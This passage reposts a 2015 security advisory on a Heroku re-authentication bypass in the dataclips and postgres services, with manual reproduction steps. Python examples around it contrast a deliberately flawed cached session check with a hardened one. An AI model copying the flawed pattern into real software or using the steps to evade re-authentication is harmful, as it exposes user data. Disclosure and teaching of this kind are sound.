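            return 401, "re-authentication required"
        return 200, f"{action} as {user}"


if __name__ == "__main__":
    clock = FakeClock()
    auth = CentralAuth(idle_timeout=900, clock=clock)
    auth.login("sid-1", "alice")
    cached, checked = CachedSessionService(auth), CheckedSessionService(auth)
    print(cached.handle("sid-1", "list dataclips"))
    clock.advance(901)  # main session has now expired
    print("cached :", cached.handle("sid-1", "add dataclip"))
    print("checked:", checked.handle("sid-1", "add dataclip"))
```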

[FD] Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

Document Title:
===============
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

References (Source):
====================
http://ift.tt/1dZCVcy
Video: http://ift.tt/1QkIyTD
Vulnerability Magazine: http://ift.tt/1dsz1Ij

Release Date:
=============
2015-06-09

Vulnerability Laboratory ID (VL-ID):
====================================
1323

Common Vulnerability Scoring System:
====================================
6.1

Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.

(Copy of the Vendor Homepage: http://ift.tt/1knQSw2 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered an application-side session validation vulnerability in the official Heroku API and web-application.

Vulnerability Disclosure Timeline:
==================================
2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team)
2015-06-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re-authentication module.

The heroku web-service provides all web services with a session expiry function that disallows visiting the page without re-authentication. The dataclips page session of the editor and the postgres service allows, for example, adding new context. If the session expires in the main heroku web-service the user will be forced to log in again. During the tests we revealed that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (as shown in the video) he is able to bypass the security mechanism to add or request the database name. The session validation mechanism needs to provoke a refresh of the postgres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has expired during the usage of the heroku service.

The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction.
Successful exploitation of the vulnerability results in evasion and bypass of the re-authentication mechanism.

Proof of Concept (PoC):
=======================
The local re-auth bypass vulnerability can be exploited by local attackers with a low privilege web-application user account or by remote attackers without a privileged web-application account and with high user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the re-auth bypass vulnerability ...
1. Register a webpage account at the official heroku website
2. Provoke the re-auth function that pops up after several profile interactions during the time after the session expired
3. When the session has expired, do not press the re-auth function button in the popup that stays in place on all services
4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired for all other modules and sites
Note: Even if all sessions are expired the user is able to request the database and the dataclips in the service without authorization
5. Successful reproduction of the session vulnerability!

Video Demonstration
The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases.
The session expired values also need to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself.

Exception Message:
-Your session has expired
--Your current session has expired or become inactive and has been terminated.

Source: Gmail -> IFTTT-> Blogger
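
The fix the advisory above asks for, a sub-service that recognises the main session's expiry, shown beside the flawed pattern as an added example; it is not code from the advisory or from Heroku, and every name, the timeout value and the token are assumptions constructed for illustration.

```python
from dataclasses import dataclass

IDLE_TIMEOUT = 900  # seconds; assumed value for this example


@dataclass
class Session:
    user: str
    last_auth: float          # time of the last successful (re-)authentication
    terminated: bool = False  # set when the main service expires the session


class SessionStore:
    """Hypothetical single source of truth shared by every service."""

    def __init__(self):
        self._sessions = {}

    def create(self, token, user, now):
        self._sessions[token] = Session(user, now)

    def expire(self, token):
        self._sessions[token].terminated = True

    def is_valid(self, token, now):
        s = self._sessions.get(token)
        return s is not None and not s.terminated and now - s.last_auth < IDLE_TIMEOUT


def dataclip_add_weak(store, local_cache, token, now):
    # Flawed pattern: the sub-service trusts its own cached session state
    # and never asks whether the main session has expired.
    return "created" if token in local_cache else "re-auth required"


def dataclip_add_hardened(store, local_cache, token, now):
    # Corrected pattern: every request re-validates against the shared
    # store, and stale local state is dropped when validation fails.
    if not store.is_valid(token, now):
        local_cache.discard(token)
        return "re-auth required"
    return "created"


def demo():
    store, cache = SessionStore(), {"tok-constructed"}
    store.create("tok-constructed", "alice", now=0)
    store.expire("tok-constructed")  # main service: "Your session has expired"
    weak = dataclip_add_weak(store, cache, "tok-constructed", now=10)
    hard = dataclip_add_hardened(store, cache, "tok-constructed", now=10)
    return weak, hard
```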